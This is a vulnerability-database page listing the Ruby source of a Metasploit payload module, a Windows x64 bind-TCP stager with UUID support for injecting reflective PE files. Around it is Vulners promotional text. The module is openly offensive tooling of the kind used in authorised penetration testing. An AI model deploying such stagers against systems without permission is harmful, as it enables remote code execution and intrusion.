Lucene search
K

Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)

🗓️ 02 Sep 2020 17:41:02Reported by ege <[email protected]>, sf <[email protected]>, OJ ReevesType 
metasploit
 metasploit
🔗 www.rapid7.com👁 19 Views

Inject custom PE file using reflective loader, bind TCP stage

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  CachedSize = 524

  include Msf::Payload::Stager
  include Msf::Payload::Windows::BindTcp_x64

  def self.handler_type_alias
    'bind_tcp_uuid'
  end

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Bind TCP Stager with UUID Support (Windows x64)',
        'Description' => 'Listen for a connection with UUID Support (Windows x64)',
        'Author' => [ 'sf', 'OJ Reeves' ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_X64,
        'Handler' => Msf::Handler::BindTcp,
        'Convention' => 'sockrdi',
        'Stager' => { 'RequiresMidstager' => false }
      )
    )
  end

  #
  # Override the uuid function and opt-in for sending the
  # UUID in the stage.
  #
  def include_send_uuid
    true
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Nov 2025 18:58Current
7.1High risk
Vulners AI Score7.1
19